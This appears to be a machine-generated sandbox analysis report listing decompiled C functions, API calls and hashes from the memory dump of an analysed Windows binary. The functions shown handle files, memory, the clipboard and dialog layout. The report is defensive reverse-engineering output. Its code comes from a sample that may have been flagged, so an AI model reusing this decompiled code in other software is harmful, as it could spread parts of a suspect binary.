                                                                                                                                                • Opcode Fuzzy Hash: b680f323cfde0812eaa853d45ec535210a74fce6e52df2a6edf0fc9c67542069
                                                                                                                                                • Instruction Fuzzy Hash: B1C092B0290200BEFE204A10AD0AF77355EE780700F1084307A00E80E1C2A14C058524
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00405338, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00405338(WCHAR* _a4) {
				void* _t3;

				_t3 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0, 0); // executed
				return _t3;
			}




                                                                                                                                                0x0040534a
                                                                                                                                                0x00405350

                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: 83eae67f61fdf2e100365e4956c39274e7302c90c3fc809a9cab9d68c9c26962
                                                                                                                                                • Instruction ID: d588f5942abdbf62074f27fc8161704726317c11aca05e571d26f2c48b98c5da
                                                                                                                                                • Opcode Fuzzy Hash: 83eae67f61fdf2e100365e4956c39274e7302c90c3fc809a9cab9d68c9c26962
                                                                                                                                                • Instruction Fuzzy Hash: B3C092B0280200BEFE224A10FD16F36355DE780700F2044347E00F80E0C1604E158524
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040DA82, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040DA82(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040D9FC, 0); // executed
				return 1;
			}



                                                                                                                                                0x0040da91
                                                                                                                                                0x0040da9a

                                                                                                                                                APIs
                                                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,0040D9FC,00000000), ref: 0040DA91
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EnumNamesResource
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3334572018-0
                                                                                                                                                • Opcode ID: aaa027c10fa78c39d5f0445afb734b26800a59b0cae26a5917b0f34e50669d9c
                                                                                                                                                • Instruction ID: 51e3a4b42ca36b746c75c5eb4a2aee4057f89303c93404922418ae0f581905ac
                                                                                                                                                • Opcode Fuzzy Hash: aaa027c10fa78c39d5f0445afb734b26800a59b0cae26a5917b0f34e50669d9c
                                                                                                                                                • Instruction Fuzzy Hash: F5C09B3356438197C7119F508C09F1B7A95BB54705F504C397151A40E1C7714018A605
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040405E, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040405E(void** __esi) {
				void* _t1;
				signed int* _t2;

				_t2 = __esi;
				_t1 =  *__esi;
				if(_t1 != 0xffffffff) {
					_t1 = FindCloseChangeNotification(_t1); // executed
				}
				 *_t2 =  *_t2 | 0xffffffff;
				return _t1;
			}





                                                                                                                                                0x0040405e
                                                                                                                                                0x0040405e
                                                                                                                                                0x00404063
                                                                                                                                                0x00404066
                                                                                                                                                0x00404066
                                                                                                                                                0x0040406c
                                                                                                                                                0x0040406f

                                                                                                                                                APIs
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                • Opcode ID: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
                                                                                                                                                • Instruction ID: 40547022017336ee125913f65e591b655fd6556432e54264b79cbfeb0dc3c2d4
                                                                                                                                                • Opcode Fuzzy Hash: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
                                                                                                                                                • Instruction Fuzzy Hash: ECB09270500541CBE6345F78884980A7AA4AA813703B44B28A1F6F10F2D33888468A14
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004057D1, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E004057D1(WCHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesW(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}




                                                                                                                                                0x004057d5
                                                                                                                                                0x004057e5

                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                • Opcode ID: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
                                                                                                                                                • Instruction ID: f1cceac889999bb919f5bca999730fd8e3c757b1acafb66fb331f39110631968
                                                                                                                                                • Opcode Fuzzy Hash: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
                                                                                                                                                • Instruction Fuzzy Hash: FFB012B52100014BCB1807349D4508D35905F44631B31873CB037D0CF0E730CCA8BA00
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004048DA, Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 90%
                                                                                                                                                			E004048DA(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, void** _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t20;
				void* _t22;
				intOrPtr _t25;
				intOrPtr _t29;
				intOrPtr _t31;
				void* _t38;
				void** _t40;
				intOrPtr* _t47;

				_t38 = __edx;
				_t34 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = _a4;
				_t40 = _a12;
				_t31 = 0;
				 *((intOrPtr*)(_a4 + 0x248)) = _t40;
				_v8 = 0;
				if( *((intOrPtr*)(_t40 + 0x428)) <= 0) {
					L3:
					_t20 = 0;
					L4:
					if(_t20 != 0) {
						_t22 = E00404489(_t44 + 0x14, _t34, _t38, _t40, _t20); // executed
						_t53 = _t22;
						if(_t22 != 0) {
							E00406729( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x418)) + 0xec)), _t44 + 4);
							_t47 = _a4;
							_t25 = E00404689(_a12, _t53,  *((intOrPtr*)(_t47 + 0x220)),  *((intOrPtr*)(_t44 + 4))); // executed
							 *_t47 = _t25;
							 *((intOrPtr*)(_t47 + 0x10)) = 1;
							_v8 = 1;
						}
					}
					return _v8;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t29 = E00403F2B(_t31, _t40 + 0x41c);
					_push(_a8);
					_v12 = _t29;
					L0040E03E();
					_t34 = _t29;
					if(_t29 == 0) {
						break;
					}
					_t31 = _t31 + 1;
					if(_t31 <  *((intOrPtr*)(_t40 + 0x428))) {
						continue;
					}
					goto L3;
				}
				_t20 = _v12;
				goto L4;
			}
















                                                                                                                                                0x004048da
                                                                                                                                                0x004048da
                                                                                                                                                0x004048dd
                                                                                                                                                0x004048de
                                                                                                                                                0x004048e1
                                                                                                                                                0x004048e5
                                                                                                                                                0x004048e8
                                                                                                                                                0x004048ea
                                                                                                                                                0x004048f6
                                                                                                                                                0x004048f9
                                                                                                                                                0x00404923
                                                                                                                                                0x00404923
                                                                                                                                                0x00404925
                                                                                                                                                0x00404927
                                                                                                                                                0x0040492e
                                                                                                                                                0x00404933
                                                                                                                                                0x00404935
                                                                                                                                                0x00404946
                                                                                                                                                0x0040494d
                                                                                                                                                0x00404959
                                                                                                                                                0x0040495e
                                                                                                                                                0x00404963
                                                                                                                                                0x00404966
                                                                                                                                                0x00404966
                                                                                                                                                0x00404935
                                                                                                                                                0x00404970
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004048fb
                                                                                                                                                0x004048fb
                                                                                                                                                0x00404903
                                                                                                                                                0x00404908
                                                                                                                                                0x0040490b
                                                                                                                                                0x0040490f
                                                                                                                                                0x00404917
                                                                                                                                                0x00404918
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040491a
                                                                                                                                                0x00404921
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00404921
                                                                                                                                                0x00404973
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2081463915-0
                                                                                                                                                • Opcode ID: 1a5aa7950c8524b605f159770a309709ad0bf62fba3d30ff973a537a5b72f3ad
                                                                                                                                                • Instruction ID: fdc747c80fe88fd67bd043bcbe7cc9eb3f50563aa05d6d30472a65970944665d
                                                                                                                                                • Opcode Fuzzy Hash: 1a5aa7950c8524b605f159770a309709ad0bf62fba3d30ff973a537a5b72f3ad
                                                                                                                                                • Instruction Fuzzy Hash: 9D115EF5600205AFC710DF79C88099AB7B8FF48354F10453EEA55E3240D734A9508BA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00403FDE, Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00403FDE(void** __eax, void* __eflags, WCHAR* _a4) {
				void* __ecx;
				void* __esi;
				intOrPtr _t11;
				void* _t14;
				intOrPtr _t15;
				intOrPtr* _t16;
				intOrPtr* _t22;

				_t22 = __eax;
				 *(__eax + 0x414) =  *(__eax + 0x414) & 0x00000000;
				E0040405E(__eax);
				_t11 = E00405338(_a4);
				 *_t22 = _t11;
				if(_t11 == 0xffffffff) {
					L7:
					 *((intOrPtr*)(_t22 + 0x414)) = GetLastError();
					L8:
					return 0;
				}
				_t14 = E00405E43(_t22 + 4, _t11, _t22 + 4, 0x400); // executed
				if(_t14 == 0) {
					goto L7;
				}
				_t15 =  *((intOrPtr*)(_t22 + 0x418));
				if( *((intOrPtr*)(_t15 + 4)) == 0x89abcdef) {
					_t16 = _t15 + 0xec;
					__eflags =  *_t16;
					if(__eflags == 0) {
						 *_t16 = 0x1000;
					}
					E00404541(__eflags, _t22); // executed
					return 1;
				}
				 *((intOrPtr*)(_t22 + 0x414)) = 0xfff1;
				goto L8;
			}










                                                                                                                                                0x00403fe0
                                                                                                                                                0x00403fe2
                                                                                                                                                0x00403fe9
                                                                                                                                                0x00403ff2
                                                                                                                                                0x00403ffb
                                                                                                                                                0x00403ffd
                                                                                                                                                0x0040404b
                                                                                                                                                0x00404051
                                                                                                                                                0x00404057
                                                                                                                                                0x00000000
                                                                                                                                                0x00404057
                                                                                                                                                0x00404009
                                                                                                                                                0x00404013
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00404015
                                                                                                                                                0x00404022
                                                                                                                                                0x00404030
                                                                                                                                                0x00404035
                                                                                                                                                0x00404038
                                                                                                                                                0x0040403a
                                                                                                                                                0x0040403a
                                                                                                                                                0x00404041
                                                                                                                                                0x00000000
                                                                                                                                                0x00404048
                                                                                                                                                0x00404024
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040405E: FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066
                                                                                                                                                  • Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A
                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00403B9A,?), ref: 0040404B
                                                                                                                                                  • Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$ChangeCloseCreateErrorFindLastNotificationRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4176926985-0
                                                                                                                                                • Opcode ID: 28e05b3785312bd73728d28a7b4e7de4c452789e56a0673e54d11ff134628f3e
                                                                                                                                                • Instruction ID: 1be67c3d07cfbe594be31b534527c337e1243451ed86295bd1db7fefa69627cd
                                                                                                                                                • Opcode Fuzzy Hash: 28e05b3785312bd73728d28a7b4e7de4c452789e56a0673e54d11ff134628f3e
                                                                                                                                                • Instruction Fuzzy Hash: FD01D1F10016008AD320AB20C805B9376E8DF91315F10893FE3A6F72C1EB7C98818AA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00406355, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00406355(signed int* __esi) {
				void* _t5;
				signed int* _t7;

				_t7 = __esi;
				_t5 =  *__esi;
				if(_t5 != 0) {
					free(_t5); // executed
					 *__esi =  *__esi & 0x00000000;
				}
				_t7[1] = _t7[1] & 0x00000000;
				_t7[2] = _t7[2] & 0x00000000;
				return _t5;
			}





                                                                                                                                                0x00406355
                                                                                                                                                0x00406355
                                                                                                                                                0x00406359
                                                                                                                                                0x0040635c
                                                                                                                                                0x00406361
                                                                                                                                                0x00406364
                                                                                                                                                0x00406365
                                                                                                                                                0x00406369
                                                                                                                                                0x0040636d

                                                                                                                                                APIs
                                                                                                                                                • free.MSVCRT(00000000,004065BB,74B04E00,?,00000000), ref: 0040635C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: 087bb4fc264830983fe200f1886ef8bdbde26bdfe1ad20cb23c944558e33102c
                                                                                                                                                • Instruction ID: 3b7e158b20e84301f479c6044b2c5b8c75456169b8cefd1b15b644340405c36b
                                                                                                                                                • Opcode Fuzzy Hash: 087bb4fc264830983fe200f1886ef8bdbde26bdfe1ad20cb23c944558e33102c
                                                                                                                                                • Instruction Fuzzy Hash: 8FC04C72910B019BE7349F26D449766B3E4BF1073BF618C2DA4D5914C1DBBCE494CA18
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00403F55, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00403F55(void** __esi) {
				void* _t5;
				signed int* _t7;

				_t7 = __esi;
				_t5 =  *__esi;
				if(_t5 != 0) {
					free(_t5); // executed
				}
				 *_t7 =  *_t7 & 0x00000000;
				_t7[3] = _t7[3] & 0x00000000;
				_t7[1] = _t7[1] & 0x00000000;
				return _t5;
			}





                                                                                                                                                0x00403f55
                                                                                                                                                0x00403f55
                                                                                                                                                0x00403f59
                                                                                                                                                0x00403f5c
                                                                                                                                                0x00403f61
                                                                                                                                                0x00403f62
                                                                                                                                                0x00403f65
                                                                                                                                                0x00403f69
                                                                                                                                                0x00403f6d

                                                                                                                                                APIs
                                                                                                                                                • free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: ca8b33ba02bdd68b061cc876ecb80c5c4dc103e44f57bd864d81743fd2e6ef53
                                                                                                                                                • Instruction ID: 3143f4fb3421a8fd8d8aef00c743a9b8e7153b02c0e56cadf99ac6914a485b7f
                                                                                                                                                • Opcode Fuzzy Hash: ca8b33ba02bdd68b061cc876ecb80c5c4dc103e44f57bd864d81743fd2e6ef53
                                                                                                                                                • Instruction Fuzzy Hash: 48C00272910B019FE7309E26C405B66B7E8AF1073BF918C1D94D5914C1D7BCD4448A14
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 0040AE4D, Relevance: 1.5, APIs: 1, Instructions: 21clipboardCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040AE4D(signed int __eax, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				void* __edi;
				int _t11;
				void* _t13;
				void* _t15;
				void* _t17;

				_t15 = __edx;
				_t13 = __ecx;
				_t16 = __esi + 0x6ac;
				E0040637A(__eax | 0xffffffff, __esi + 0x6ac, 0x40f454);
				 *((intOrPtr*)(__esi + 0x6bc)) = 0x4000;
				E0040AE99(_t13, _t15, __esi,  *((intOrPtr*)(__esi + 0x69c)));
				_t17 = E0040636E(_t16);
				_t11 = OpenClipboard( *(__esi + 0x208));
				if(_t11 != 0) {
					return E004054F1(_t17);
				}
				return _t11;
			}








                                                                                                                                                0x0040ae4d
                                                                                                                                                0x0040ae4d
                                                                                                                                                0x0040ae4e
                                                                                                                                                0x0040ae5c
                                                                                                                                                0x0040ae67
                                                                                                                                                0x0040ae72
                                                                                                                                                0x0040ae84
                                                                                                                                                0x0040ae86
                                                                                                                                                0x0040ae8e
                                                                                                                                                0x00000000
                                                                                                                                                0x0040ae96
                                                                                                                                                0x0040ae98

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
                                                                                                                                                  • Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC
                                                                                                                                                  • Part of subcall function 0040AE99: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0040AEEB
                                                                                                                                                • OpenClipboard.USER32(?), ref: 0040AE86
                                                                                                                                                  • Part of subcall function 004054F1: EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
                                                                                                                                                  • Part of subcall function 004054F1: wcslen.MSVCRT ref: 00405506
                                                                                                                                                  • Part of subcall function 004054F1: GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
                                                                                                                                                  • Part of subcall function 004054F1: GlobalLock.KERNEL32 ref: 00405523
                                                                                                                                                  • Part of subcall function 004054F1: memcpy.MSVCRT ref: 0040552C
                                                                                                                                                  • Part of subcall function 004054F1: GlobalUnlock.KERNEL32(00000000), ref: 00405535
                                                                                                                                                  • Part of subcall function 004054F1: SetClipboardData.USER32 ref: 0040553E
                                                                                                                                                  • Part of subcall function 004054F1: CloseClipboard.USER32 ref: 0040554E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Clipboard$Global$memcpywcslen$AllocCloseDataEmptyLockMessageOpenSendUnlock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2178300729-0
                                                                                                                                                • Opcode ID: 2bf5dca165b34132fb64bb1855b861156878277b56bd8399cb3bfe959ead56f4
                                                                                                                                                • Instruction ID: d2c7d0a254bb278864896b88801620e30a707c529b051fe324ebedfb26bf80ea
                                                                                                                                                • Opcode Fuzzy Hash: 2bf5dca165b34132fb64bb1855b861156878277b56bd8399cb3bfe959ead56f4
                                                                                                                                                • Instruction Fuzzy Hash: F0E0DFB1100B0056C6217736A801B9B76A26F80324B100B3EF8A6B11E2CB3960AA9A49
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040D12C, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 98%
                                                                                                                                                			E0040D12C(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, signed int _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, short _a72, intOrPtr _a76, struct tagRECT _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a584) {
				signed int _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v52;
				struct HWND__* _v56;
				struct HWND__* _v60;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct HDC__* _t169;
				struct HWND__* _t171;
				intOrPtr _t220;
				void* _t221;
				intOrPtr _t232;
				struct HWND__* _t234;
				void* _t237;
				intOrPtr* _t271;
				signed int _t272;
				signed int _t273;

				_t271 = __esi;
				_t273 = _t272 & 0xfffffff8;
				E0040E340(0x4298, __ecx);
				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e4));
				_t234 = GetDlgItem( *(__esi + 0x10), 0x3e9);
				_a4 = GetDlgItem( *(__esi + 0x10), 0x3e8);
				_a20 = GetWindowLongW(_t234, 0xfffffff0);
				_a24 = GetWindowLongW(_a4, 0xfffffff0);
				_a96 = GetWindowLongW(_t234, 0xffffffec);
				_a36 = GetWindowLongW(_a4, 0xffffffec);
				GetWindowRect(_t234,  &_a100);
				GetWindowRect(_a4,  &_a60);
				MapWindowPoints(0,  *(__esi + 0x10),  &_a100, 2);
				MapWindowPoints(0,  *(__esi + 0x10),  &_a60, 2);
				_t237 = _a108 - _a100.x;
				_a4 = _a4 & 0x00000000;
				_a28 = _a68 - _a60.x;
				_a76 = _a112 - _a104;
				_a40 = _a72 - _a64;
				_t169 = GetDC( *(__esi + 0x10));
				_a16 = _t169;
				if(_t169 == 0) {
					L9:
					_v0 = _v0 & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)) <= 0) {
						L12:
						_t171 = GetDlgItem( *(_t271 + 0x10), 1);
						_a36 = _t171;
						GetWindowRect(_t171,  &_a44);
						MapWindowPoints(0,  *(_t271 + 0x10),  &_a44, 2);
						GetClientRect( *(_t271 + 0x10),  &_a124);
						GetWindowRect( *(_t271 + 0x10),  &_a80);
						SetWindowPos( *(_t271 + 0x10), 0, 0, 0, _a88 - _a80.left + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
						GetClientRect( *(_t271 + 0x10),  &_a80);
						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
					}
					_a20 = _a20 | 0x10000000;
					_a24 = _a24 | 0x10000000;
					_a8 = _a12 + 0x10;
					do {
						 *((intOrPtr*)( *_t271 + 0x20))(_v0);
						_v24 = E00401551(_t271, _a92, L"STATIC", _a16, _a96, _v0 + _a100.x, _t237, _a72);
						_v52 = E00401551(_t271, _v0, L"EDIT", _v12, _a24, _v32 + _a28, _v8,  *(_t271 + 0x48) * _a4);
						L0040DFD6();
						_t273 = _t273 + 0x10;
						SetWindowTextW(_v56,  &_a72);
						SetWindowTextW(_v60,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x40))))))(_v68,  &_a584,  &_a72, 0xff, L"%s:", _v60->i));
						_v68 = _v68 + 0x14;
						_v72 = _v72 +  *(_t271 + 0x48) * _v36 +  *((intOrPtr*)(_t271 + 0x4c));
						_v76 = _v76 + 1;
					} while (_v76 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
					goto L12;
				}
				_t220 = 0;
				_a32 = _a32 & 0;
				_a8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e0)) <= 0) {
					L8:
					_t221 = _t220 - _t237;
					_a28 = _a28 - _t221;
					_a60.x = _a60.x + _t221;
					_t237 = _t237 + _t221;
					ReleaseDC( *(_t271 + 0x10), _a16);
					goto L9;
				}
